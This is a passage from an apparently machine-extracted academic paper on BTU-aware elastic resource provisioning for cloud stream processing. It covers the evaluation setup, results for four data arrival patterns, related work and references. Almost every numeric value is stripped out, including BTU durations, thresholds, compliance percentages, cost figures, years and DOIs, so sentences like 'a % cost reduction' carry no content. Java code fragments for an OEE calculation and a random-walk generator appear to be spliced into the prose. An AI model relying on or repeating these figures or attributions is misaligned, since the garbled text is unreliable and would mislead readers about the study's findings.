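        return (totalProducedGoods - totalDefectiveGoods) / totalProducedGoods;
    }

    public static void main(String[] args) {
        double perf = performance(27, 0.33, 10);   // 27 items in a 10 min cycle, 0.33 min ideal time per item
        double avail = availability(480, 30, 15);  // 8 h shift with 30 min planned and 15 min unplanned downtime
        double qual = quality(1000, 25);           // 25 defective items out of 1000 produced goods
        double oee = avail * perf * qual;          // oee = availability * performance * quality
        System.out.printf("performance=%.3f availability=%.3f quality=%.3f oee=%.3f%n", perf, avail, qual, oee);
    }
}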
the most relevant vm for our evaluation is the infrastructure vm, which hosts the visp runtime as well as all other relevant services, like the message infrastructure, i.e., rabbitmq (https://www.rabbitmq.com), the shared state, i.e., redis (http://redis.io) and the data storage, i.e., a mysql (https://www.mysql.com) database. for the topology enactment, the visp runtime leases (and releases) an arbitrary amount of vms, i.e., dockerhost vms, on the private openstack-based cloud at runtime. these dockerhost vms are used to run the operator instances, which take care of the actual data processing as described in “system architecture.” the operator images, which are required to run the operator instances, are hosted on an external service, i.e., hochreiner et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://www.openstack.org https://www.rabbitmq.com http://redis.io https://www.mysql.com http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ dockerhub (https://hub.docker.com). finally, the data provider vm is in charge of simulating the data stream from the sensors, as described in “sensor types.” evaluation configuration for the scalingthreshold used in algorithm , we use the value . this value was selected to be high enough to allow for minimal hardware disturbances, e.g., moving data from memory to the hard drive, but low enough to react to small changes of the data volume. the concrete value was identified on a number of preliminary experiments, evaluating different thresholds in the range of – , items, whereas the threshold was identified as the most suitable value for our purpose. regarding the individual weights w –w used in algorithm , we use the default value of to evaluate the base design of our btu-based provisioning approach without any specific emphasis on either the number of instances, scaling operations, queue load or the processing delay. besides the configuration aspects for algorithms and , there are also several other configuration aspects for the visp runtime. we chose a monitoring timespan of s, i.e., the queue load and resource usage of the system is recorded every s. the resource provisioning interval is set to s. this interval has been selected to update the resource configuration for the spe in short time intervals while ensuring enough time to download operator images from the external repository within one resource provisioning interval. regarding the btu, we use three different btu durations. the first duration is min (btu ), which used to be the predominant btu of amazon ec (https://aws.amazon. com/emr/pricing/). the second duration is min (btu ), which represented the minimal btu for the google compute engine (https://cloud.google.com/compute/ pricing) and the last duration is min (btu ), which has been selected to present a middle ground between the other two btus. furthermore, we assume a linear pricing model for the btus, i.e., one leasing duration for the btu model results in cost, one leasing duration for the btu model results in cost and the leasing duration for the btu model results in cost. for each data item, which is delayed, we accrue . penalty cost, i.e., , delayed items render the same cost as leasing a vm for min. these penalty cost have been chosen to impose little cost for delayed processing compared to penalty cost in other domains, e.g., for business processes (hoenisch et al., ). 
figure : deployment for the evaluation scenario. [components: the data provider vm runs the visp data provider; the infrastructure vm runs the visp runtime, the message infrastructure, the shared state and the data storage; the dockerhost vms run the operator instances; the operator images are hosted on docker hub; all vms are deployed on an openstack cloud]

however, preliminary experiments have shown that higher penalty cost, e.g., . or . , would render unreasonably high penalty cost compared to the actual resource cost, even for a high sla compliance. finally, each dockerhost vm has the same computational resources with four virtual cpu cores and gb ram.

baseline
to evaluate our btu-based provisioning approach, we have selected a threshold-based baseline provisioning approach. the baseline implements a commonly used provisioning approach which already achieves very good results in terms of cost reduction against an over-provisioning scenario, as shown in our previous work (hochreiner et al., a). the approach considers the amount of data items waiting on the incoming queue for processing as the scaling trigger. as soon as the variable oqueue exceeds an upper threshold according to algorithm , the spe triggers an upscaling operation for this operator, and as soon as oqueue falls below a lower threshold, i.e., , the spe triggers one downscaling action for an operator. besides the single upscaling trigger, our threshold-based approach triggers the upscaling operation twice if oqueue surpasses a second upper threshold of data items waiting for processing. regarding the leasing of vms, we apply an on-demand approach, where the spe leases a new vm as soon as all currently used vms are fully utilized and releases a vm as soon as the last operator instance on that vm is terminated.

data arrival pattern
for our evaluation, we have selected four different arrival patterns which simulate different load scenarios for the spe by submitting varying data volumes to the spe. the first arrival pattern has three different data volume levels, which are changed stepwise, so that the resulting arrival pattern approximates a sine curve, as shown in fig. a. these three volume levels simulate different numbers of manufacturing machines, ranging from two to eight machines, that emit different amounts of data items, as shown in table . to speed up the evaluation, we simulate the real-time data emissions shown in table every ms. this enables us to simulate real-time minutes within only min in the course of our evaluation and therefore also increases the load on the spe. this also results in a volume level change every min. the second arrival pattern has only two levels, i.e., the lowest and the highest of the first pattern, which confronts the spe with more drastic volume changes, as shown in fig. b. due to the fact that we only apply two different levels, the state changes are twice as long as for the first pattern, i.e., min. the third and the fourth pattern represent random walks as defined by eq. ( ), whereas r represents a random number between and . this random walk is initialized with machine = and we have selected two random walk patterns which stay between one and eight machines.
the results of this random walk can be seen in fig. c for the first random walk and in fig. d for the second one. due to the random characteristics of the pattern generation, these patterns exhibit more changes of the data volume within short time spans compared to the first two data arrival patterns. the random walk is defined as follows:

machine_n = machine_{n-1} - 1 if r < . , machine_{n-1} if . <= r <= . , and machine_{n-1} + 1 if r > . ( )

all four patterns are continuously generated by the visp data provider (https://github.com/visp-streaming/dataprovider) throughout the whole evaluation duration of min.

figure : data arrival patterns. (a) shows the stepwise data arrival pattern; (b) shows the -level data arrival pattern; (c) shows the data arrival pattern based on random walk ; (d) shows the data arrival pattern based on random walk . [panels plot manufacturing machines over time (minutes)]

metrics
to compare the evaluation results for both the btu-based and the threshold-based resource provisioning approaches, we have selected several metrics that describe both the overall cost and the sla compliance. after each evaluation run, these metrics are extracted by the visp reporting utility (https://github.com/visp-streaming/reporting). the most important metric is paid btus, which describes the total cost for data processing. this value comprises all vm upscaling and vm prolonging operations, which either lease new vms or extend the leasing of existing ones for another btu. the vm downscaling metric sums up all downscaling operations which are conducted before the end of the btu. the next set of metrics describes the sla compliance of the stream processing application. each stream processing operator is assigned a specific processing duration which describes the processing duration in a constant over-provisioning scenario. due to the changing data volume in our evaluation scenarios, it is often the case that the system suffers from under-provisioning for a short time, which results in longer processing durations. to assess the overall compliance of the processing durations, we define three different sla compliance levels. the first compliance level requires real-time processing capabilities and states the share of data items that are processed within the given processing duration. the second level applies near-real-time requirements, which are defined by processing durations that take at most twice as long as the defined processing duration, and the third level applies a relaxed strategy, which means that the data items need to be processed within at most five times the stated processing duration. these sla metrics are obtained from the processing durations of the data items, which are recorded by the operators. to reduce the overall monitoring overhead, we only measure the processing duration of every th data item.
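for illustration, the random-walk arrival pattern defined above can be generated with a short sketch like the following; the step thresholds (0.3/0.7), the clamping to the range of one to eight machines and the seed are assumptions, since the published constants are not reproduced here and the paper instead selected walks that happened to stay in that range.

import java.util.Random;

public final class RandomWalkArrivalPatternSketch {

    static int[] generate(int steps, int initialMachines, long seed) {
        Random rnd = new Random(seed);
        int[] machines = new int[steps];
        int current = initialMachines;
        for (int n = 0; n < steps; n++) {
            double r = rnd.nextDouble();              // r is a random number between 0 and 1
            if (r < 0.3) {
                current = current - 1;                // decrease the number of machines by one
            } else if (r > 0.7) {
                current = current + 1;                // increase the number of machines by one
            }                                         // otherwise: keep the previous value
            current = Math.max(1, Math.min(8, current)); // stay between one and eight machines (assumption)
            machines[n] = current;
        }
        return machines;
    }

    public static void main(String[] args) {
        for (int m : generate(20, 1, 42L)) {
            System.out.print(m + " ");
        }
        System.out.println();
    }
}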
nevertheless, preliminary evaluations with other intervals, e.g., every data item or every third data item have shown a similar metric reliability. this similar reliability can be explained due to the fact that observing every th data item still yields about – performance readings/second (depending on the data volume). therefore it is save to assume that these metrics cover all scaling decisions of the spe because all other activities, e.g., spawning a new operator instance takes – s or leasing a new vm takes about – s. the time to adapt metric states the arithmetic mean duration, which is required until the delayed processing for an operator type is back to real-time processing. the last metrics describe the scaling operations of operator instances. here we consider upscaling, downscaling as well as migration operations among different hosts. results and discussion for our evaluation we consider four different provisioning approaches. the first approach is the btu-agnostic threshold-based approach while the other three approaches are btu- based approaches with three different btu configurations as discussed in “evaluation deployment.” to obtain reliable numbers, we have conducted three evaluation runs for each provisioning approach and data arrival pattern, which results in evaluation runs. these evaluations have been executed over the time span of four weeks on a private openstack cloud. the raw data of the evaluation runs is hosted on github (https://github. com/visp-streaming/peerj_rawdata) and the concrete numbers can be reproduced by means of the visp reporting tool (https://github.com/visp-streaming/reporting). the discussion of our evaluation is divided in four subsections based on the four data arrival patterns. each subsection features a table which lists the average numbers of the three evaluation runs alongside with their standard deviations. additionally, we also provide a figure which represents the resource configurations of the operator instances and vms over the course of the evaluation for each data arrival pattern. hochreiner et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/visp-streaming/peerj_rawdata https://github.com/visp-streaming/peerj_rawdata https://github.com/visp-streaming/reporting http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ for the discussion we are going to analyze the differences between the btu-based and the threshold-based approach in detail only for the stepwise data arrival pattern because this arrival pattern allows us to isolate specific aspects of the btu-based approach. nevertheless, our evaluations shows that the overall trend regarding the sla compliance and total cost is the same for all four data arrival patterns. for the other arrival patterns we only highlight specific aspects of the individual pattern and refer for all other effects to the discussion of the stepwise data arrival pattern. stepwise data arrival pattern for the stepwise pattern, we can see that the overall sla compliance is higher for the btu- based approach for all three sla compliance scenarios as shown in table . this compliance benefit ranges from % for the btu configuration in the real-time compliance scenario, up to % in the relaxed compliance scenario for the btu configuration. the sla compliance gain can be explained due to the downscaling strategy of the btu-based approach in contrast to the on-demand one for the threshold- based approach. 
the threshold-based approach only considers the amount of data items that are waiting for processing for each operator type when making scaling decisions, which can be observed in fig. d. this figure shows that the line for the operator instances follows the data volume very closely with a short delay, because the threshold-based approach can only react to changes of the data volume. on closer inspection, one can also identify smaller increases after the downscaling phases, e.g., around minutes , or . these smaller bumps indicate that the downscaling approach was too eager and the spe has to compensate by scaling up again. throughout this time span, i.e., between the detection of a lack of processing capabilities and the successful upscaling for the operator type, the spe is very likely to violate the sla compliance, especially in the real-time scenario. the btu-based approach does not exhibit such a strongly coupled relationship between the operator instances and the data volume. while the upscaling trigger is the same for both scenarios, there are clear differences in the downscaling behavior. the btu-based approach only considers downscaling activities briefly before the end of a btu, e.g., around minutes or for the btu scenario, around minute for the btu scenario and around minute for the btu scenario in figs. b and c.

table : evaluation results for the stepwise scenario. [rows: real-time, near real-time and relaxed compliance, resource cost and total cost per compliance level; columns: btu-based (btu , btu , btu ) and threshold-based]

the result of this lazy downscaling strategy is a decrease of scaling activities, especially for the btu and btu scenarios. this decrease in scaling activities results in a better sla compliance, since the spe already maintains the processing capabilities for future data volume peaks, as is the case for the stepwise data arrival pattern. this results in high sla compliance values of over % for the btu and btu scenarios. it needs to be noted that the lack of active downscaling activities does not increase the cost for computational resources, since these resources have already been paid for at the beginning of their btu. the btu-based downscaling operations are often triggered at suitable times, e.g., around minutes and for the btu configuration or minute for the btu configuration, where the downscaling activities do not impact the sla compliance. nevertheless, there are also points in time when the btu of a vm coincides with a peak of the data volume, e.g., at minute for the btu configuration. in these situations, the btu-based approach will initialize the downscaling procedure to release a vm shortly before the end of its btu.
figure : stepwise pattern. (a) shows the resource provisioning configuration using the btu-based approach with a btu of min for the stepwise data arrival pattern; (b) shows the configuration using the btu-based approach with a btu of min for the stepwise data arrival pattern; (c) shows the configuration using the btu-based approach with a btu of min for the stepwise data arrival pattern; (d) shows the configuration using the threshold-based approach for the stepwise data arrival pattern. [panels plot manufacturing machines and vms as well as operator instances over time (minutes)]

in this specific case around minute for the btu scenario, the downscaling procedure is successful because the monitoring does not report any delays for processing based on algorithm , and the vm is triggered to be shut down. but in the next reasoning cycle, the spe realizes the lack of processing capabilities and leases another vm to compensate for the resource requirements. although these inefficient scaling operations result in a measurable overhead as well as a reduction of the sla compliance, the btu-based approach still achieves a better sla compliance than the threshold-based approach. furthermore, it can be seen that the amount of scaling activities for the operator instances is inverse to the length of the btu. for the btu configuration, it can be observed in fig. a that the level of scaling activities is similar to that of the threshold-based scenario. this results in a rather low sla compliance, but for the btu and especially the btu configuration there are fewer downscaling events, i.e., btu ends, which reduces the need to scale up again to comply with future data volume peaks. besides the sla compliance, we also consider the operational cost for data processing. these costs are composed of the resource cost, i.e., the cost for leasing vms, and the penalty cost, which accrues for delayed data processing. in table , it can be seen that the resource cost for the btu and btu configurations are higher than the ones for the threshold-based approach. these higher costs can be explained by the defensive approach of releasing vms for the btu-based approach, which often results in leasing a vm for another btu based on algorithm . for the btu configuration, the resource cost is around % lower than for the threshold-based configuration. although the btu configuration uses more computational resources, as shown in fig. c, the overall cost is lower, because the threshold-based approach often releases vms prematurely before the end of their btu, which results in a waste of already paid resources. when we consider only the resource cost, we can see that the btu-based approach only outperforms the threshold-based approach for the btu configuration. nevertheless, this situation changes when we also consider the penalty cost, i.e., the cost for , delayed items.
after adding the penalty cost and analyzing the total cost for the different compliance scenarios, we can see that only the real-time total cost for the btu configuration is higher than for the threshold-based approach. all other scenarios result in slightly lower cost for the btu configuration in the real-time scenario and up to a % cost reduction for the near real-time scenario for the btu configuration.

two-level data arrival pattern
the two-level data arrival pattern exhibits the same trend for the sla compliance and cost as the stepwise data arrival pattern, as shown in table . when we analyze figs. a–d, we can also see a similar scaling behavior compared to the stepwise data arrival pattern. nevertheless, there is one notable effect for the btu configuration in fig. c. the btu-based provisioning approach tends to start more and more operator instances throughout the evaluation run. we can see that after minute , when the spe has enough processing capabilities, the upscaling trigger requests new operator instances from time to time to cope with the data volume. these upscaling operations are most likely due to minor external events, e.g., short network delays caused by other applications running on the same physical hardware, which cause the spe to obtain new processing capabilities. the result of this slow increase of operator instances over time is that the spe is likely to have more processing capabilities than it actually needs. nevertheless, at the end of the btu of a vm, the necessity of these processing capabilities is evaluated, and, for example, in the btu configuration the operator instances are cut back around minute .

figure : two-level pattern. (a) shows the resource provisioning configuration using the btu-based approach with a btu of min for the -level data arrival pattern; (b) shows the configuration using the btu-based approach with a btu of min for the -level data arrival pattern; (c) shows the configuration using the btu-based approach with a btu of min for the -level data arrival pattern; (d) shows the configuration using the threshold-based approach for the -level data arrival pattern. [panels plot manufacturing machines and vms as well as operator instances over time (minutes)]

table : evaluation results for the two-level scenario. [rows: real-time, near real-time and relaxed compliance, resource cost and total cost per compliance level; columns: btu-based (btu , btu , btu ) and threshold-based]

after a short recalibration phase between
minutes and , the spe follows the same pattern again until the resources are cut back again around minute . this mechanism allows the spe to use the already leased resources, i.e., no additional vms are leased from minute until , to achieve a high resource utilization.

random walk data arrival pattern
based on the numbers in table , we can see that the random walk data arrival pattern follows the same trend for the sla compliance as well as the total cost as the stepwise data arrival pattern. on closer inspection we can see that the sla compliance is very similar, with a deviation of less than %. this aspect shows that both the baseline and the btu-based provisioning approach have similar characteristics for the rather simple data arrival patterns, like the stepwise or two-level one, as well as for random ones. based on figs. a–d, we can identify one notable difference between the btu-based and the threshold-based resource provisioning approach. while the operator instance curve and the data volume curve are well aligned for the threshold-based and the btu configuration, we can identify a clear gap for the btu configuration in fig. b and especially for the btu configuration (fig. c). for the latter two configurations, the operator instance curve remains high although the data volume decreases over time. this behavior can be explained by the optimal usage of the already paid resources, which enables the btu and btu configurations to keep the running operator instances without any additional cost. although this behavior may seem to be a waste of resources at first sight, due to the deviation between the actual data volume and the operator instances, it becomes beneficial for the spe in terms of sla compliance when the volume rises again, e.g., around minutes or .

random walk data arrival pattern
the numerical results in terms of the sla compliance and total cost follow similar trends as for the stepwise data arrival pattern scenario, based on the numbers in table . for this data arrival pattern, also only the btu configuration requires more cost than the threshold-based baseline for the real-time scenario. all other configurations and scenarios result in lower cost than the baseline.

table : evaluation results for random walk . [rows: real-time, near real-time and relaxed compliance, resource cost and total cost per compliance level; columns: btu-based (btu , btu , btu ) and threshold-based]

when we analyze the graphical representation of figs. a–d for the random walk data arrival pattern, the most prominent difference in contrast to the random walk data arrival pattern is the even better alignment of the operator instance and data volume curves.
this is due to the fact that the data volume is rising in the second part of the evaluation, i.e., after minute , and the already paid resources can be actively used for data processing instead of only serving as free backup processing capabilities.

figure : random walk pattern . (a) shows the resource provisioning configuration using the btu-based approach with a btu of min for the random walk data arrival pattern ; (b) shows the configuration using the btu-based approach with a btu of min for the random walk data arrival pattern ; (c) shows the configuration using the btu-based approach with a btu of min for the random walk data arrival pattern ; (d) shows the configuration using the threshold-based approach for the random walk data arrival pattern . [panels plot manufacturing machines and vms as well as operator instances over time (minutes)]

table : evaluation results for random walk . [rows: real-time, near real-time and relaxed compliance, resource cost and total cost per compliance level; columns: btu-based (btu , btu , btu ) and threshold-based]

furthermore, it can be seen that the btu-based approach requires fewer scaling activities between minutes and in contrast to the threshold-based approach shown in fig. d. this is again due to the lazy release characteristics of the btu-based approach, which results in a higher sla compliance in contrast to the threshold-based approach.

evaluation conclusion
when we compare the evaluation results of the four different data arrival patterns, we can see that they all share the same trend. regarding the sla compliance, we can see that the btu-based approach achieves a better sla compliance for all configurations and all compliance scenarios. furthermore, the sla values are roughly the same (with a maximum deviation of %) across all data arrival patterns despite their different characteristics. for the total cost, we can also see that only the btu configuration for the real-time scenario results in higher cost in contrast to the baseline. all other configurations and scenarios for the btu-based approach exhibit a cost reduction. additionally, it must be noted that the resource cost is always lower for the btu configuration than for the threshold-based approach.
figure : random walk pattern . (a) shows the resource provisioning configuration using the btu-based approach with a btu of min for the random walk data arrival pattern ; (b) shows the configuration using the btu-based approach with a btu of min for the random walk data arrival pattern ; (c) shows the configuration using the btu-based approach with a btu of min for the random walk data arrival pattern ; (d) shows the configuration using the threshold-based approach for the random walk data arrival pattern . [panels plot manufacturing machines and vms as well as operator instances over time (minutes)]

we can also observe that the compliance for real-time data processing on cloud infrastructures is rather low, i.e., around % for the baseline and around – % for the btu-based approach. this is mainly due to the fact that cloud environments are often influenced by other applications running on the same physical hardware. this can result in minor data transmission or processing delays that have a severe impact on the sla compliance. nevertheless, we can see that for the near real-time and relaxed time scenarios, the sla compliance ranges from % to % for the btu-based approach, which meets the requirements of our motivational scenario discussed in "motivation."

threats to applicability
although the presented system model builds on top of real-world observations, it cannot be guaranteed that all external aspects are adequately considered in our system model, which may result in a non-optimal performance in real-world deployments. nevertheless, we consider this risk to be rather small, since we have already conducted our evaluations in a cloud-based testbed, which already considers external influences by other applications running on the same cloud environment. to consider such external effects for the evaluation, we repeated each evaluation scenario and configuration three times on different days (including the weekend) to cover different usage scenarios on the openstack-based cloud due to other stakeholders on the same physical hardware.

related work
in the last couple of years, the landscape of spes has been constantly growing. in contrast to the rather basic spes, like aurora (balakrishnan et al., ) or borealis (abadi et al., ), which were designed more than a decade ago, today's spes incorporate technological advances like cloud computing and can process large volumes of data in parallel. while some of these spes are rather focused on cluster-based deployments, like system s (gedik et al., ), most are designed to utilize cloud-based deployments, like apache spark (zaharia et al., ), apache flink (carbone et al., ), apache storm (toshniwal et al., ) or its derivative heron (kulkarni et al., ).
despite the focus on designing efficient spes, the resource elasticity aspects of individual operator instances (or workers) have only been picked up recently, e.g., for apache spark streaming or the automatic reconfiguration for apache storm based on hints for the number of workers. to the best of our knowledge there exists no established spes which consider a two-level resource provisioning architecture, since most spes outsource this functionality to other frameworks like apache mesos or kubernetes. however, there are a couple of prototypes and concepts in the literature, which propose a mechanism for elastic stream processing. several research groups have picked up the challenge of replacing the previously dominant strategy of data quality degradation, i.e., load shedding (babcock, datar & motwani, ; tatbul, çetintemel & zdonik, ), with resource elasticity. nevertheless, most of the first publications focus on an optimal resource configuration only when deploying a topology and do not consider any updates at runtime, e.g., setty et al. ( ) for pub/sub systems or florescu & kossmann ( ) for database systems. the next step hochreiner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ toward resource elasticity was proposed by lim, han & babu ( ), who proposed the redeployment of complete applications for database management systems whenever the resource requirements change. although this approach already supports resource elasticity, it was required to refine this approach to only consider operator instances instead of complete applications. one of the first publications in the domain of data stream processing was authored by schneider et al. ( ), which proposed the parallelization of stream processing operations with system s. because this first approach only considered stateless operators, the authors complemented their approach in a succeeding publication to consider the replication of stateful operators (gedik et al., ). besides the elasticity extension to system s, there are also several proposed extensions to apache storm, which replace the default scheduler with custom implementations to optimize the parallelization of operators as well as the placement thereof on different computational resources. two of these approaches have been presented by aniello, baldoni & querzoni ( ) and xu et al. ( ). these two publications present threshold-based custom schedulers, which can adopt the topology deployment at runtime, depending on the incoming data volume and the actual load for apache storm. although any replication of a specific operator provides additional processing capabilities, it needs to be noted that any reconfiguration of the topology enactment has a negative impact on the processing performance. to minimize these reconfiguration aspects, stela (xu, peng & gupta, ), introduces new performance indicators to focus on the actual throughput of the spe and to reduce any reconfiguration aspects. to extend the rather static aspect of the threshold-based scaling approaches, heinze et al. ( ) propose a threshold-based resource optimization, whose thresholds are adopted based on an online learning mechanism within a custom spe. this allows resource optimization to adapt the otherwise fixed thresholds, which are predefined before the topology enactment, at runtime to improve the resource utilization based on actual monitoring data. 
seep (castro fernandez et al., ), another custom spe, also proposes a simple threshold-based replication mechanism. in contrast to the other already discussed approaches, seep focuses on stateful operators and employs a dedicated fault tolerance mechanism. besides the basic replication approaches, there are also some works that optimize specific aspects for the topology enactment. one of these aspects is the partitioning of data to optimize the data flow among the operators, especially regarding stateful operators. the streamcloud (gulisano et al., ) spe proposes a mechanism to partition the incoming data to distribute it efficiently among different replicas of one operator type. another approach for optimizing the overall efficiency of a topology enactment is to optimize the placement of operators within a potential heterogeneous pool of computational resources. cardellini et al. ( ) propose an extension to apache storm, which considers an optimal placement of operators in terms of sla-based criteria on different cloud resources. furthermore, de matteis & mencagli ( ) present a predictive approach to minimize the latency and improve the energy efficiency of the spe. this approach allows to reduce the reconfiguration of spes, which is also one of the objectives in our approach. the last notable approach for optimizing the topology enactment on hochreiner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ cloud resources is to optimize the deployment of operators according to their specific processing tasks. hanna et al. ( ) consider different types of vms, e.g., with an emphasis on cpu or gpu, and optimize the deployment based on the suitability of these machines to conduct specific operations, e.g., matrix multiplications are significantly faster when executed on the gpu. although the literature already provides different optimization approaches, to the best of our knowledge, none of these approaches considers the btu aspect of vms when optimizing processing resources as proposed in this paper. also, most of the discussed approaches only aim at optimizing the amount of replicas for processing operators, but do ignore the reconfiguration overhead during the topology enactment. conclusion within this paper, we have discussed the most important requirements for optimizing data stream processing in volatile environments. based on these requirements, we have developed an extensive system model for which we have presented a btu-based optimization approach. this optimization approach has been evaluated with four different data arrival pattern against a threshold-based approach, which already provides a significant cost reduction based on our previous work (hochreiner et al., a). the evaluation has shown that the btu-based approach results in a better sla compliance which also achieves a better overall cost structure compared to the threshold-based approach. nevertheless, as a result of the evaluation, we have also identified a potential extension possibility for our btu-based approach, namely the addition of a more sophisticated predictive component. so far we only consider the trend for upscaling operator instances, but we do not consider historical information nor other monitoring information, e.g., as suggested by copil et al. ( ), for downscaling purposes, which could yield even better results. in our future work, we plan to also apply our btu-based approach to hybrid clouds. 
this requires an extension of the optimization model regarding the networking capabilities among these clouds. furthermore, we plan to investigate the structural properties of the topology in more detail, e.g., to identify critical paths or high volume operators, such as the operators o and o in our topology. these insights may help us to apply different scaling priorities, especially for downscaling operations to avoid oscillating effects. in addition we also plan to evaluate the impact of using the individual weights w –w in algorithm within both private and hybrid clouds. additional information and declarations funding this work is supported by tu wien research funds and by the commission of the european union within the crema h -ria project (grant agreement no. ). there was no additional external funding received for this study. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. hochreiner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ grant disclosures the following grant information was disclosed by the authors: tu wien research funds and by the commission of the european union within the crema h -ria project: . competing interests schahram dustdar and stefan schulte are academic editors for peerj. author contributions � christoph hochreiner conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. � michael vögler conceived and designed the experiments, wrote the paper, reviewed drafts of the paper. � stefan schulte wrote the paper, reviewed drafts of the paper. � schahram dustdar reviewed drafts of the paper. data availability the following information was supplied regarding data availability: the source code repositories for the prototype implementation, evaluation tools as well as the raw data for the evaluation can be found in the visp-streaming project: https://github.com/visp-streaming. references abadi dj, ahmad y, balazinska m, cetintemel u, cherniack m, hwang j-h, lindner w, maskey a, rasin a, ryvkina e. . the design of the borealis stream processing engine. in: conference on innovative data systems research, asilomar, ca, usa, – . andonov r, poirriez v, rajopadhye s. . unbounded knapsack problem: dynamic programming revisited. european journal of operational research ( ): – doi . /s - ( ) - . aniello l, baldoni r, querzoni l. . adaptive online scheduling in storm. in: th international conference on distributed event-based systems (debs), arlington, tx, usa. new york: acm, – . armbrust m, fox a, griffith r, joseph ad, katz r, konwinski a, lee g, patterson d, rabkin a, stoica i, zaharia m. . a view of cloud computing. communications of the acm ( ): – doi . / . . babcock b, datar m, motwani r. . load shedding for aggregation queries over data streams. in: th international conference on data engineering, boston, ma, usa. piscataway: ieee, – . balakrishnan h, balazinska m, carney d, çetintemel u, cherniack m, convey c, galvez e, salz j, stonebraker m, tatbul n, tibbetts r, zdonik s. . retrospective on aurora. international journal on very large data bases ( ): – doi . /s - - - . carbone p, katsifodimos a, ewen s, markl v, haridi s, tzoumas k. . apache flink: stream and batch processing in a single engine. data engineering bulletin ( ): – . 
hochreiner et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/visp-streaming http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . / . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ cardellini v, grassi v, lo presti f, nardelli m. . distributed qos-aware scheduling in storm. in: th international conference on distributed event-based systems (debs), oslo, norway. new york: acm, – . castro fernandez r, migliavacca m, kalyvianaki e, pietzuch p. . integrating scale out and fault tolerance in stream processing using operator state management. in: international conference on management of data (sigmod), new york, ny, usa. new york: acm, – . copil g, moldovan d, truong h-l, dustdar s. . rsybl: a framework for specifying and controlling cloud services elasticity. acm transactions on internet technology ( ): – doi . / . de matteis t, mencagli g. . keep calm and react with foresight: strategies for low-latency and energy-efficient elastic data stream processing. in: st acm sigplan symposium on principles and practice of parallel programming, barcelona, spain. new york: acm, – . florescu d, kossmann d. . rethinking cost and performance of database systems. acm sigmod record ( ): – doi . / . . gedik b, andrade h, wu k-l, yu ps, doo m. . spade: the system s declarative stream processing engine. in: international conference on management of data (sigmod), vancouver, bc, canada. new york: acm, – . gedik b, schneider s, hirzel m, wu k-l. . elastic scaling for data stream processing. transactions on parallel and distributed systems ( ): – doi . /tpds. . . genaud s, gossa j. . cost-wait trade-offs in client-side resource provisioning with elastic clouds. in: international conference on cloud computing (cloud), washington, dc, usa. piscataway: ieee, – . gulisano v, jimenez-peris r, patino-martinez m, soriente c, valduriez p. . streamcloud: an elastic and scalable data streaming system. ieee transactions on parallel and distributed systems ( ): – doi . /tpds. . . hanna f, marchal l, nicod j-m, philippe l, rehn-sonigo v, sabbah h. . minimizing rental cost for multiple recipe applications in the cloud. in: international parallel and distributed processing symposium workshops (ipdpsw), chicago, il, usa. piscataway: ieee, – . heinze t, roediger l, meister a, ji y, jerzak z, fetzer c. . online parameter optimization for elastic data stream processing. in: th acm symposium on cloud computing. new york: acm, – . hindman b, konwinski a, zaharia m, ghodsi a, joseph ad, katz rh, shenker s, stoica i. . mesos: a platform for fine-grained resource sharing in the data center. in: th usenix conference on networked systems design and implementation (nsdi), boston, ma, usa. berkeley: usenix association, . hochreiner c. . visp testbed—a toolkit for modeling and evaluating resource provisioning algorithms for stream processing applications. in: kopp o, lenhard j, pautasso c, eds. in: th zeus workshop (zeus ), lugano, switzerland. ceur-ws, – . hochreiner c, schulte s, dustdar s, lecue f. . elastic stream processing for distributed environments. ieee internet computing ( ): – doi . /mic. . . hochreiner c, vögler m, schulte s, dustdar s. a. elastic stream processing for the internet of things. in: th international conference on cloud computing (cloud), san francisco, ca, usa. pisacataway: ieee, – . hochreiner c, vögler m, waibel p, dustdar s. b. visp: an ecosystem for elastic data stream processing for the internet of things. 
in: th international enterprise distributed object computing conference (edoc), vienna, austria. pisacataway: ieee, – . hochreiner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / http://dx.doi.org/ . / . http://dx.doi.org/ . /tpds. . http://dx.doi.org/ . /tpds. . http://dx.doi.org/ . /mic. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ hoenisch p, schuller d, schulte s, hochreiner c, dustdar s. . optimization of complex elastic processes. transactions on services computing ( ): – doi . /tsc. . . kulkarni s, bhagat n, fu m, kedigehalli v, kellogg c, mittal s, patel jm, ramasamy k, taneja s. . twitter heron: stream processing at scale. in: international conference on management of data (sigmod), melbourne, victoria, australia. new york: acm, – . lim h, han y, babu s. . how to fit when no one size fits. in: th biennial conference on innovative data systems research (cidr ’ ), asilomar, ca, usa, . lohrmann b, janacik p, kao o. . elastic stream processing with latency guarantees. in: th international conference on distributed computing systems (icdcs), columbus, oh, usa. piscataway: ieee, – . mcafee a, brynjolfsson e, davenport th, patil d, barton d. . big data: management revolution. harvard business review ( ): – . nakajima s. . introduction to tpm: total productive maintenance. new york: productivity press, inc. satzger b, hummer w, leitner p, dustdar s. . esc: towards an elastic stream computing platform for the cloud. in: international conference on cloud computing (cloud), washington, dc, usa. piscataway, – . schneider s, andrade h, gedik b, biem a, wu k-l. . elastic scaling of data parallel operators in stream processing. in: international symposium on parallel & distributed processing (ipdps), rome, italy. piscataway, – . schulte s, hoenisch p, hochreiner c, dustdar s, klusch m, schuller d. . towards process support for cloud manufacturing. in: th international enterprise distributed object computing conference (edoc), ulm, germany. piscataway: ieee, – . setty v, vitenberg r, kreitz g, urdaneta g, van steen m. . cost-effective resource allocation for deploying pub/sub on cloud. in: th international conference on distributed computing systems (icdcs), madrid, spain. piscataway: ieee, – . tatbul n, çetintemel u, 